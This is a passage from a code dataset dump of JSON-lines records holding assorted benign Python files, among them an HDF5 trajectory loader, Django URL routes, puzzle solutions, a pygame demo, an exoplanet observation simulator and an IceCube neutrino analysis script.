h5py, HDF5 lib and numpy\")\n\n if isinstance(filename_or_buffer, string_types):\n fh = h5py.File(filename_or_buffer, 'r')\n should_be_closed = True\n else:\n fh = filename_or_buffer\n should_be_closed = False\n\n traj = _load_hdf5_from_buffer(fh, autoconvert=autoconvert, restype=restype, top=top)\n\n if should_be_closed:\n fh.close()\n\n return traj\n\ndef _load_hdf5_from_buffer(fh, autoconvert=True, restype=None, top=None):\n import json\n from ..Topology import Topology\n from ..Trajectory import Trajectory\n from ..core import Atom, Box\n from ..core import mass_atomic_number_dict, mass_element_dict\n # NOTE: always use `np.float64` in pytraj\n if autoconvert:\n UNIT = 10.\n else:\n UNIT = 1.\n\n try:\n import h5py\n import numpy as np\n except ImportError:\n raise ImportError(\"require h5py, HDF5 lib and numpy\")\n\n try:\n cell_lengths = fh['cell_lengths'].value * UNIT\n box_arr = np.hstack((cell_lengths, fh['cell_angles'])).astype(np.float64)\n has_box = True\n except:\n has_box = False\n\n crd = fh['coordinates'].value.astype(np.float64)\n n_frames, n_atoms, _ = crd.shape\n if autoconvert:\n crd = crd * UNIT\n\n if restype is None:\n farray = Trajectory()\n farray._allocate(n_frames, n_atoms)\n elif restype == 'api.Trajectory':\n from pytraj import api\n farray = api.Trajectory()\n\n # create Topology\n if top is not None:\n _top = top\n else:\n top_txt = fh['topology']\n h5_topology = json.loads(top_txt.value.tostring().decode())\n _top = Topology()\n for chain in h5_topology['chains']:\n _top.start_new_mol()\n for residue in chain['residues']:\n resname = residue['name']\n resid = residue['index']\n for atom in residue['atoms']:\n aname = atom['name']\n atype = aname # no infor about atom type in .h5 file from openmm (?)\n try:\n charge = atom['charge']\n except:\n charge = 0.0\n try:\n mass = atom['mass']\n except:\n try:\n mass = mass_element_dict[atom['element']]\n except:\n try:\n mass = mass_atomic_number_dict[atom['atomic_number']]\n except:\n mass = 1.0\n atom = Atom(aname, atype, charge, mass)\n _top.add_atom(atom=atom, resid=resid, resname=resname)\n # add bonds\n # Note: no PBC info for top\n _top.add_bonds(np.asarray(h5_topology['bonds']))\n # naively assigne box info from 1st frame\n if has_box:\n _top.box = Box(box_arr[0])\n farray.top = _top\n\n # update coords\n if restype is None:\n farray.update_xyz(crd)\n if has_box:\n for idx, arr in enumerate(crd):\n farray[idx].box = box_arr[idx] # auto-cast\n else:\n farray.xyz = crd\n\n return farray\n","sub_path":"pytraj/externals/_load_HDF5.py","file_name":"_load_HDF5.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"310405839","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', 'app.views.home', name='home'),\n url(r'^new/$', 'app.views.new', name='new'),\n url(r'^save/$', 'app.views.save', name='save'),\n url(r'^validate/$', 'app.views.validate', name='validate'),\n url(r'^add/$', 'app.views.add', name='add'),\n url(r'^manifest.webapp$', 'app.views.manifest', name='manifest'),\n url(r'^robots.txt$', 'app.views.robots', name='robots'),\n url(r'^admin/', include(admin.site.urls)),\n)\n\n","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"291439823","text":"# FizzBuzz\n\ndef main():\n\n n = int(input('Enter a number: '))\n\n if n % 15 == 0:\n print('FizzBuzz')\n elif n % 3 == 0:\n print('Fizz')\n elif n % 5 == 0:\n print('Buzz')\n else:\n print('Your number is not divisasble by 3, 5, or 15')\n\nmain()\n","sub_path":"FizzBuzz-easy.py","file_name":"FizzBuzz-easy.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"122219546","text":"busses = set()\narrival_time = -1\nwith open('input.txt', 'r') as f:\n line = f.readline()\n arrival_time = int(line[:-1])\n line = f.readline()\n busses.update(line[:-1].split(','))\nbusses.remove('x')\narrival_times = []\nfor bus in busses:\n arrival_times.append((int(bus) - (arrival_time % int(bus)), int(bus)))\n # arrival_times[i] = (waiting_time, bus_number)\nshortest_wait = sorted(arrival_times)[0]\nprint(shortest_wait[0] * shortest_wait[1])\n","sub_path":"day13/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"93291614","text":"import sys, timeit\n\n'''\nCreate a dictionary of various sizes and then time accessing an element of the dictionary\n'''\n\ndef setupDictionary(n):\n d = {}\n for i in range(n):\n key = f\"key{i}\"\n value = f\"value{i}\"\n d[key] = value\n return d\n\nd = {}\ndef timeDictionaryAccess(N):\n global d\n d = setupDictionary(N)\n statement = f\"\"\"v = d['key{N//2}']\"\"\"\n print(N, timeit.timeit(statement, globals=globals()))\n\ntimeDictionaryAccess(10)\ntimeDictionaryAccess(100)\ntimeDictionaryAccess(1000)\ntimeDictionaryAccess(10000)\ntimeDictionaryAccess(100000)\ntimeDictionaryAccess(1000000)\ntimeDictionaryAccess(10000000)\n \n","sub_path":"Python3/src/03 More on Data Types/Dictionaries/09_access_times_of_dict.py","file_name":"09_access_times_of_dict.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"494449542","text":"\nimport pysynphot as psyn\nfrom psisim import spectrum\nimport numpy as np\nimport scipy.interpolate as si\nimport scipy.integrate as integrate\n\ndef simulate_observation(telescope,instrument,planet_table_entry,planet_spectrum,wvs,spectrum_R,\n inject_noise=True,verbose=False,post_processing_gain = 10,return_noise_components=False):\n '''\n A function that simulates an observation\n\n Inputs:\n Telescope - A Telescope object\n Instrument - An Instrument object\n planet_table_entry - an entry/row from a Universe planet table\n planet_spectrum - A planet spectrum from simulate spectrum given in contrast units\n observing_configs - To be defined\n\n Outputs: \n F_lambda, F_lambda_error\n '''\n\n\n ##### ALL UNITS NEED TO BE PROPERLY EXAMINED #####\n\n #Some relevant planet properties\n separation = planet_table_entry['AngSep']/1000\n star_imag = planet_table_entry['StarImag']\n star_spt = planet_table_entry['StarSpT']\n\n #Get the stellar spectrum at the wavelengths of interest. \n #The stellar spectrum will be in units of photons/s/cm^2/angstrom\n stellar_spectrum = spectrum.get_stellar_spectrum(planet_table_entry,wvs,instrument.current_R,\n verbose=verbose)\n\n #Multiply the stellar spectrum by the collecting area and a factor of 10,000\n #to convert from m^2 to cm^2 and get the stellar spectrum in units of photons/s\n stellar_spectrum *= telescope.collecting_area*10000 # A factor of 10000 to convert the tles\n\n #Multiply by atmospheric transmission\n stellar_spectrum *= telescope.get_atmospheric_transmission(wvs)\n\n #Multiply by instrument throughputs\n stellar_spectrum *= instrument.get_inst_throughput(wvs)\n stellar_spectrum *= instrument.get_filter_transmission(wvs,instrument.current_filter)\n\n #Multiply by the quantum efficiency\n stellar_spectrum *= instrument.qe\n\n #Now let's put the planet spectrum back into physical units\n #This assumes that you have properly carried around 'wvs' \n #and that the planet_spectrum is given at the wvs wavelengths. \n scaled_spectrum = planet_spectrum*stellar_spectrum\n\n # Instrument and Sky thermal background in photons/s/cm^2/Angstrom\n thermal_sky = telescope.get_sky_background(wvs)\n thermal_sky *= instrument.get_inst_throughput(wvs)\n thermal_inst = instrument.get_instrument_background(wvs) # need to think about this\n thermal_flux = thermal_sky + thermal_inst\n thermal_flux *= telescope.collecting_area*10000 # phtons/s/Angstrom\n thermal_flux *= instrument.get_filter_transmission(wvs, instrument.current_filter)\n thermal_flux *= instrument.qe #e-/s/Angstrom\n\n #Downsample to instrument wavelength sampling\n detector_spectrum = []\n detector_stellar_spectrum = []\n detector_thermal_flux = []\n intermediate_spectrum = si.interp1d(wvs, scaled_spectrum)\n intermediate_stellar_spectrum = si.interp1d(wvs, stellar_spectrum)\n intermediate_thermal_spectrum = si.interp1d(wvs, thermal_flux)\n for inst_wv, inst_dwv in zip(instrument.current_wvs, instrument.current_dwvs):\n wv_start = inst_wv - inst_dwv/2.\n wv_end = inst_wv + inst_dwv/2.\n\n flux = 1e4*integrate.quad(intermediate_spectrum, wv_start, wv_end)[0] # detector spectrum now in e-/s (1e4 is for micron to angstrom conversion)\n stellar_flux = 1e4*integrate.quad(intermediate_stellar_spectrum, wv_start, wv_end)[0] # detector spectrum now in e-/s\n thermal_flux = 1e4*integrate.quad(intermediate_thermal_spectrum, wv_start, wv_end)[0] # detector spectrum now in e-/s\n detector_spectrum.append(flux)\n detector_stellar_spectrum.append(stellar_flux)\n detector_thermal_flux.append(thermal_flux)\n\n detector_spectrum = np.array(detector_spectrum)\n detector_stellar_spectrum = np.array(detector_stellar_spectrum)\n detector_thermal_flux = np.array(detector_thermal_flux)\n\n #Multiply by the exposure time\n detector_spectrum *= instrument.exposure_time #The detector spectrum is now in e-\n detector_stellar_spectrum *= instrument.exposure_time #The detector spectrum is now in e-\n detector_thermal_flux *= instrument.exposure_time\n\n #Multiply by the number of exposures\n detector_spectrum *= instrument.n_exposures\n detector_stellar_spectrum *= instrument.n_exposures\n detector_thermal_flux *= instrument.n_exposures\n\n ########################################\n ##### Now get the various noise sources:\n\n speckle_noise,read_noise,dark_noise,photon_noise = get_noise_components(separation,star_imag,instrument,\n instrument.current_wvs,star_spt,detector_stellar_spectrum,detector_spectrum,detector_thermal_flux)\n\n #Apply a post-processing gain\n speckle_noise /= post_processing_gain\n\n ## Sum it all up\n total_noise = np.sqrt(speckle_noise**2+read_noise**2+dark_noise**2+photon_noise**2)\n\n # Inject noise into spectrum\n if inject_noise:\n # For each point in the spectrum, draw from a normal distribution,\n # with a mean centered on the spectrum and the standard deviation\n # equal to the noise\n for i,noise in enumerate(total_noise):\n # import pdb; pdb.set_trace()\n detector_spectrum[i] = np.random.normal(detector_spectrum[i],noise)\n\n #TODO: Currently everything is in e-. We likely want it in a different unit at the end. \n \n if return_noise_components:\n return detector_spectrum, total_noise, np.array(detector_stellar_spectrum), np.array([speckle_noise,read_noise,dark_noise,photon_noise])\n else:\n return detector_spectrum, total_noise, np.array(detector_stellar_spectrum)\n\ndef get_noise_components(separation,star_imag,instrument,wvs,star_spt,stellar_spectrum,detector_spectrum,thermal_spectrum):\n '''\n Calculate all of the different noise contributions\n '''\n\n #### TODO include photon noise from the speckles\n \n # First is speckle noise.\n # Instrument.get_speckle_noise should return things in contrast units relative to the star\n speckle_noise = instrument.get_speckle_noise(separation,star_imag,instrument.current_filter,wvs,star_spt)[0]\n\n #Convert the speckle noise to photons\n speckle_noise *= stellar_spectrum \n\n # Multiply the read noise by sqrt(n_exposures)\n read_noise = speckle_noise*0.+np.sqrt(instrument.n_exposures)*instrument.read_noise\n \n #Add the dark_current to the spectrum and calculate dark noise. NEVERMIND NOT ADDING TO SPECTRUM RIGHT NOW\n dark_current = instrument.dark_current*instrument.exposure_time*instrument.n_exposures\n # detector_spectrum += dark_current\n dark_noise = speckle_noise*0.+np.sqrt(dark_current)\n\n #TODO:Add the background noise\n\n #Photon noise. Detector_spectrum should be in total of e- now.\n photon_noise = np.sqrt(detector_spectrum + thermal_spectrum + speckle_noise)\n\n return speckle_noise,read_noise,dark_noise,photon_noise\n\ndef simulate_observation_set(telescope, instrument, planet_table,planet_spectra,wvs,spectra_R,inject_noise=False,\n post_processing_gain=10,return_noise_components=False):\n '''\n Simulates observations of multiple planets, with the same observing configs\n \n Inputs:\n Telescope - A Telescope object\n Instrument - An Instrument object\n planet_table - a Universe planet table\n planet_spectra_list - A list of planet spectra. One for each entry in the planet table\n inject_noise - choose whether or not to inject noise into the spectrum now or not\n\n\n Outputs: \n F_lambdas, F_lambda_errors\n '''\n\n n_planets = np.size(planet_table) #Not sure this will work\n\n F_lambdas = []\n F_lambdas_stellar = []\n F_lambda_errors = []\n noise_components = []\n\n for i,planet in enumerate(planet_table):\n if return_noise_components:\n new_F_lambda,new_F_lambda_errors,new_F_lambda_stellar,F_lambda_noise_components = simulate_observation(telescope,instrument,\n planet,planet_spectra[i], wvs, spectra_R, inject_noise = inject_noise, post_processing_gain=post_processing_gain,\n return_noise_components=return_noise_components)\n F_lambdas.append(new_F_lambda)\n F_lambdas_stellar.append(new_F_lambda_stellar)\n F_lambda_errors.append(new_F_lambda_errors)\n noise_components.append(F_lambda_noise_components)\n else:\n new_F_lambda,new_F_lambda_errors,new_F_lambda_stellar = simulate_observation(telescope,instrument,\n planet,planet_spectra[i], wvs, spectra_R, inject_noise = inject_noise, post_processing_gain=post_processing_gain)\n F_lambdas.append(new_F_lambda)\n F_lambdas_stellar.append(new_F_lambda_stellar)\n F_lambda_errors.append(new_F_lambda_errors)\n\n\n F_lambdas = np.array(F_lambdas)\n F_lambda_stellar = np.array(F_lambdas_stellar)\n F_lambda_errors = np.array(F_lambda_errors)\n noise_components = np.array(noise_components)\n \n if return_noise_components:\n return F_lambdas,F_lambda_errors,F_lambdas_stellar, noise_components\n else:\n return F_lambdas,F_lambda_errors,F_lambdas_stellar\n\n\n\n\n","sub_path":"psisim/observation.py","file_name":"observation.py","file_ext":"py","file_size_in_byte":9090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"67204242","text":"import json\nimport requests\nimport argparse\nfrom math import sin, cos, asin, sqrt, radians\n\n\ndef load_data(filepath):\n with open(filepath, 'r') as json_file:\n return json.load(json_file)\n\n\ndef get_biggest_bar(data):\n return max([item for item in data], key=lambda x: x['Cells']['SeatsCount'])\n\n\ndef get_smallest_bar(data):\n return min([item for item in data], key=lambda x: x['Cells']['SeatsCount'])\n\n\ndef haversine(lon1, lat1, lon2, lat2):\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n angle = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n radian_length = 2 * asin(sqrt(angle))\n radius = 6371\n return radian_length * radius\n\n\ndef get_closest_bar(data, longitude, latitude):\n random_bar = data[0]\n min_length = haversine(\n longitude,\n latitude,\n random_bar['Cells']['geoData']['coordinates'][0],\n random_bar['Cells']['geoData']['coordinates'][1],\n )\n for item in data[1:]:\n bar_longtitude, bar_latitude = item['Cells']['geoData']['coordinates']\n length = haversine(longitude, latitude, bar_longtitude, bar_latitude)\n if length < min_length:\n min_length = length\n bar = item\n return bar\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--path', help='Path to file', required=True)\n args = parser.parse_args()\n\n bars = load_data(args.path)\n print('Самый большой бар: ', get_biggest_bar(bars)['Cells']['Name'])\n print('Самый маленький бар: ', get_smallest_bar(bars)['Cells']['Name'])\n longitude = float(input('Type longtitude: '))\n latitude = float(input('Type latitude: '))\n print(\n 'Ближайший бар: ',\n get_closest_bar(bars, longitude, latitude)['Cells']['Name'],\n )\n","sub_path":"bars.py","file_name":"bars.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"532340923","text":"import pygame as pg\r\nfrom pygame.math import Vector2\r\n\r\n\r\nclass Entity(pg.sprite.Sprite):\r\n\r\n def __init__(self, pos, *groups):\r\n super().__init__(*groups)\r\n self.image = pg.Surface((50, 30), pg.SRCALPHA) # A transparent image.\r\n # Draw a triangle onto the image.\r\n pg.draw.polygon(self.image, pg.Color('dodgerblue2'),\r\n ((0, 0), (50, 15), (0, 30)))\r\n # A reference to the original image to preserve the quality.\r\n self.orig_image = self.image\r\n self.rect = self.image.get_rect(center=pos)\r\n self.vel = Vector2(0, 0)\r\n self.pos = Vector2(pos)\r\n self.gol = (300, 300)\r\n\r\n def update(self, *args):\r\n # Subtract the pos vector from the mouse pos to get the heading,\r\n # normalize this vector and multiply by the desired speed.\r\n # self.vel = (pg.mouse.get_pos() - self.pos).normalize() * 5\r\n\r\n if args and args[0] is not None:\r\n\r\n if args[0].key == pg.K_w:\r\n self.vel = (((self.rect.topright[0] - self.rect.x) // 2 + self.rect.x,\r\n self.rect.top) - self.pos).normalize() * 5\r\n self.pos += self.vel \r\n self.rect.center = self.pos\r\n if args[0].key == pg.K_SPACE:\r\n pass\r\n if args[0].key == pg.K_s:\r\n self.vel = (((self.rect.topright[0] - self.rect.x) // 2 + self.rect.x,\r\n self.rect.top) - self.pos).normalize() * 5\r\n self.pos -= self.vel\r\n self.rect.center = self.pos\r\n\r\n if args[0].key == pg.K_d:\r\n radius, angle = self.vel.as_polar()\r\n if args[0].key == pg.K_a:\r\n pass\r\n # Update the position vector and the rect.\r\n # self.pos += self.vel\r\n # self.rect.center = self.pos\r\n\r\n # Rotate the image.\r\n # 'Vector2.as_polar' returns the polar coordinates (radius and angle).\r\n radius, angle = self.vel.as_polar()\r\n # self.image = pg.transform.rotozoom(self.orig_image, -angle, 1)\r\n # self.rect = self.image.get_rect(center=self.rect.center)\r\n\r\n\r\ndef main():\r\n screen = pg.display.set_mode((640, 480))\r\n clock = pg.time.Clock()\r\n all_sprites = pg.sprite.Group()\r\n entity = Entity((100, 300), all_sprites)\r\n\r\n done = False\r\n\r\n while not done:\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n done = True\r\n if event.type == pg.KEYDOWN:\r\n all_sprites.update(event)\r\n\r\n screen.fill((30, 30, 30))\r\n all_sprites.update(None)\r\n all_sprites.draw(screen)\r\n\r\n pg.display.flip()\r\n clock.tick(30)\r\n\r\n\r\nif __name__ == '__main__':\r\n pg.init()\r\n main()\r\n pg.quit()\r\n","sub_path":"prob2.py","file_name":"prob2.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"625559636","text":"# https://leetcode.com/problems/two-sum/submissions/\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n dict = {}\n index = -1\n \n # First throw the entire array into a dictory with the index value\n for num in nums:\n index += 1\n dict[num] = index\n\n index = -1\n # Go through each element again\n for num in nums:\n index += 1\n # Find what the other value needs to be\n candidate = target - num\n \n # Look up that value\n if candidate in dict:\n # Can't be the same value\n if dict[candidate] == index:\n continue\n # Return the two indexes whose sum equals the target\n return [index, dict[candidate]]\n ","sub_path":"two-sum.py","file_name":"two-sum.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"140843227","text":"def prime(n):\n k=5\n k2=2\n\n if n==2 or n==3:\n return True\n elif n%2==0 or n%3==0:\n return False\n else:\n while (k<=n):\n if k==n:\n return True\n elif n%k==0:\n return False\n else:\n k+=k2\n k2=6-k2 \n \n\nn=input(\"請輸入正整數:\")\n\nis_prime=False\nmax_prime=0\nfor i in range(0,len(n)):\n for j in range(i,len(n)):\n if (prime(int(n[i:j+1]))):\n if (int(n[i:j+1])>max_prime):\n max_prime= int(n[i:j+1])\n is_prime=True\n\nif (is_prime):\n print(\"子字串中最大的質數為:%d\" %(max_prime))\nelse:\n print(\"子字串中最大的質數為:No prime found\")\n\n\n\n","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"423056657","text":"#!/bin/sh /cvmfs/icecube.opensciencegrid.org/py2-v2/icetray-start\n#METAPROJECT icerec/V05-00-05\n\nfrom __future__ import division\nimport os\nimport sys\nfrom optparse import OptionParser\n\nimport numpy as np\nimport scipy as ci \nimport matplotlib\nmatplotlib.use('agg') # no 'plt.show()' any more; able to save to file, not render a window! \nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nfrom scipy.optimize import curve_fit\n# from mpl_toolkits.mplot3d import Axes3D\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import normalize\nimport tables \nimport pickle \n\n### n_file for weighting: (Jul 29, 2019). Accounted goodrunlist. \n# 11374: 18989\n# 11477: 19956\n# 11981: 19956\n# 11057: 72701\n# Livetime of processed 2012 data = 2813559.84254\n# Livetime of processed 2013 data = 2955469.73138\n# Livetime of processed 2014 data = 3052686.52963\n# Livetime of processed 2015 data = 3240653.63454\n# Livetime of processed 2016 data = 2919677.64478\n\n# NOTE: This file checks the validity of Mirco's dnn as a feature, and do data/MC comparison. \n\n\n\" ===== I/O ===== \"\n\nfig_dir = '/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/1_distribution_plots/plots/5-3_' # save fig to dir\n\nlifetime = 86400*365\n\n\n# corsika weight adjustment parameters \n\" ----- corsika weight adjustment from file 1-0_ ----- \"\nparams = np.loadtxt('/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/1_distribution_plots/weight_corsika_adjust.txt')\ndef adjust(ff): # must pass in LOG of energy!!! \n a, b, c = params[0],params[1],params[2]\n return a*(ff-b)**2 + c\n\n\n\n' 1) ===== total MC distribution ===== '\n\nwith tables.open_file('/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/data/corsika_h5/corsika_11057.h5','r') as f:\n n_file = 72701 # modified\n\n signal_dnn_corsika = f.root.DeepLearningReco_nersc_gnn_weighted_02.cols.is_signal[:]\n weight_corsika = f.root.Weight_GaisserH4a.cols.value[:] * lifetime/n_file \n\nwith tables.open_file('/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/data/nugen_h5/nugen_11374.h5','r') as f:\n n_file = 18989\n\n signal_dnn_numu = f.root.DeepLearningReco_nersc_gnn_weighted_02.cols.is_signal[:]\n ### astrophysical ###\n energy = f.root.MCPrimary.cols.energy[:]\n OneWeight = f.root.I3MCWeightDict.cols.OneWeight[:]\n NEvents = f.root.I3MCWeightDict.cols.NEvents[:]\n weight_numu_astro = (6.7 * 10**(-18))/6 * (energy/10**5)**(-2) * OneWeight/(n_file * NEvents) * lifetime * 2 # 10**5: 100 TeV. 2 is nu+nubar\n\nplt.figure(figsize=(8,7))\nplt.hist(signal_dnn_corsika,bins=200,range=[0.,1],weights=weight_corsika,histtype='step',label='corsika',color='dodgerblue',log=True,bottom=10**(-6))\nplt.hist(signal_dnn_numu,bins=200,range=[0.,1],weights=weight_numu_astro,histtype='step',label='numu',color='darkorange',log=True,bottom=10**(-6))\nplt.xlim(0.,1)\nplt.ylim(10**(-6),3*10**(5))\nplt.title(\"Mirco's DNN signal probability\")\nplt.legend()\nplt.xlabel('Signal probability')\nplt.ylabel('Events/year')\nplt.savefig(fig_dir + 'rf_mirco_dnn.png',dpi=300)\nplt.savefig(fig_dir + 'rf_mirco_dnn.pdf')\n\n\n\n\n\n\n' 2) ===== train/untrained dnn score comparison ====='\n\nprint('loading corsika...')\nwith tables.open_file('/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/data/corsika_h5/corsika_11057_trained.h5','r') as f:\n n_file = 72701 # modified\n\n signal_dnn_corsika_trained = f.root.DeepLearningReco_nersc_gnn_weighted_02.cols.is_signal[:]\n weight_corsika_trained = f.root.Weight_GaisserH4a.cols.value[:] * lifetime/n_file * 903187/424317\n\nwith tables.open_file('/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/data/nugen_h5/nugen_11374_trained.h5','r') as f:\n n_file = 18989\n\n signal_dnn_numu_trained = f.root.DeepLearningReco_nersc_gnn_weighted_02.cols.is_signal[:]\n ### astrophysical ###\n energy = f.root.MCPrimary.cols.energy[:]\n OneWeight = f.root.I3MCWeightDict.cols.OneWeight[:]\n NEvents = f.root.I3MCWeightDict.cols.NEvents[:]\n weight_numu_astro_trained = (6.7 * 10**(-18))/6 * (energy/10**5)**(-2) * OneWeight/(n_file * NEvents) * lifetime * 2 * 20964/20142 # 10**5: 100 TeV. 2 is nu+nubar\n\nwith tables.open_file('/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/data/corsika_h5/corsika_11057_untrained.h5','r') as f:\n n_file = 72701 # modified\n\n signal_dnn_corsika_untrained = f.root.DeepLearningReco_nersc_gnn_weighted_02.cols.is_signal[:]\n weight_corsika_untrained = f.root.Weight_GaisserH4a.cols.value[:] * lifetime/n_file * 903187/478870\n\nwith tables.open_file('/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/data/nugen_h5/nugen_11374_untrained.h5','r') as f:\n n_file = 18989\n\n signal_dnn_numu_untrained = f.root.DeepLearningReco_nersc_gnn_weighted_02.cols.is_signal[:]\n ### astrophysical ###\n energy = f.root.MCPrimary.cols.energy[:]\n OneWeight = f.root.I3MCWeightDict.cols.OneWeight[:]\n NEvents = f.root.I3MCWeightDict.cols.NEvents[:]\n weight_numu_astro_untrained = (6.7 * 10**(-18))/6 * (energy/10**5)**(-2) * OneWeight/(n_file * NEvents) * lifetime * 2 * 20964/822 # 10**5: 100 TeV. 2 is nu+nubar\n\n\n# NOTE: here, extract samples Mirco used for training/testing, and compare their scores. There SHOULD be no significant difference if want to use them as feature. \n\nplt.figure(figsize=(15,7))\n\nplt.subplot(121)\nplt.hist(signal_dnn_corsika_trained,bins=200,range=[0.,1],weights=weight_corsika_trained,histtype='step',label='corsika',log=True,bottom=10**(-6))\nplt.hist(signal_dnn_numu_trained,bins=200,range=[0.,1],weights=weight_numu_astro_trained,histtype='step',label='numu',log=True,bottom=10**(-6))\nplt.ylim(10**(-6),3*10**(5))\nplt.title(\"Mirco's DNN trained scores\")\nplt.legend()\nplt.xlabel('Signal probability')\nplt.ylabel('Events/year')\n\nplt.subplot(122)\nplt.hist(signal_dnn_corsika_untrained,bins=200,range=[0.,1],weights=weight_corsika_untrained,histtype='step',label='corsika',log=True,bottom=10**(-6))\nplt.hist(signal_dnn_numu_untrained,bins=200,range=[0.,1],weights=weight_numu_astro_untrained,histtype='step',label='numu',log=True,bottom=10**(-6))\nplt.ylim(10**(-6),3*10**(5))\nplt.title(\"Mirco's DNN untrained scores\")\nplt.legend()\nplt.xlabel('Signal probability')\nplt.ylabel('Events/year')\n\nplt.savefig(fig_dir + 'rf_check_train_untrained_mirco.png',bbox_inches='tight',dpi=300)\nplt.savefig(fig_dir + 'rf_check_train_untrained_mirco.pdf',bbox_inches='tight')\nplt.show()\n\n\n\n' 3) ===== data/MC comparison ====='\nexpo = 0.\nenergy_cut = 10**expo # 10**6.6\nexpo = int(expo)\n\nprint('loading corsika...')\nwith tables.open_file('/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/data/corsika_h5/corsika_11057.h5','r') as f:\n n_file = 72701 # modified\n CUT_presel = (f.root.SPEFit4TruncatedEnergy_SPICEMie_DOMS_Muon.cols.energy[:] > energy_cut)\n\n chi2_red_corsika = f.root.Collection.cols.chi2[:][CUT_presel]/f.root.Collection.cols.NDF[:][CUT_presel]\n\n signal_dnn_corsika = f.root.DeepLearningReco_nersc_gnn_weighted_02.cols.is_signal[:][CUT_presel]\n weight_corsika = f.root.Weight_GaisserH4a.cols.value[:][CUT_presel] * lifetime/n_file * 903187/424317\n print(weight_corsika)\n # weight_corsika = weight_corsika * adjust(chi2_red_corsika) * (np.sum(weight_corsika)/np.sum( weight_corsika * adjust(chi2_red_corsika) ))\n print(weight_corsika)\n\nprint('loading data_burn...')\nwith tables.open_file('/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/data/data_h5/data_burn.h5','r') as f:\n nfile_data = [2813559.84254, 2955469.73138, 3052686.52963, 3240653.63454, 2919677.64478] # _gaps.txt; 2012, 2013, 2014, 2015, 2016\n\n CUT_presel = (f.root.SPEFit4TruncatedEnergy_SPICEMie_DOMS_Muon.cols.energy[:] > energy_cut)\n\n signal_dnn_data = f.root.DeepLearningReco_nersc_gnn_weighted_02.cols.is_signal[:][CUT_presel]\n weight_data_burn = lifetime/np.sum(nfile_data) * np.ones(len(signal_dnn_data))\n\n\nplt.figure(figsize=(7,7))\nimport matplotlib.gridspec as gridspec\nplt.rcParams.update({'font.size': 19})\n\ngs = gridspec.GridSpec(2, 1, height_ratios=[4, 1])\nax1 = plt.subplot(gs[0])\n\nh,b,p = plt.hist(signal_dnn_corsika,bins=np.arange(0,1,0.02),range=[0.,1],weights=weight_corsika,histtype='step',label='corsika',log=True,bottom=10**(-6))\nhh,bb = np.histogram(signal_dnn_data,bins=np.arange(0,1,0.02),weights = weight_data_burn)\nplt.plot((bb[1:]+bb[:-1])/2,hh,'.',ms=7,alpha=0.7,label='data burn',color='black')\nplt.xlim(0,1)\nplt.ylim(10**(-6),3*10**(6))\nplt.title(\"Mirco's DNN scores, data/MC\")\nplt.legend()\nax1.xaxis.set_major_locator(ticker.MultipleLocator(0.2))\nax1.xaxis.set_minor_locator(ticker.MultipleLocator(0.02))\nplt.ylabel('Events/year')\n\nax2 = plt.subplot(gs[1])\n# error of x/y: x = hh, y = h. x/y*sqrt(1/x+1/y). Only keep terms with value > 0. \ntmp = (hh > 0.) & (h > 0)\nh = h[tmp]\nbb = ((bb[1:]+bb[:-1])/2)[tmp]\nhh = hh[tmp]\nyerr = hh/h * np.sqrt( 1/hh + 1/h )\nplt.errorbar(bb, hh/h, yerr = yerr, fmt='.',color='black')\nplt.axhline(1,ls='--',lw=1,color='black')\n\nplt.xlabel('Signal 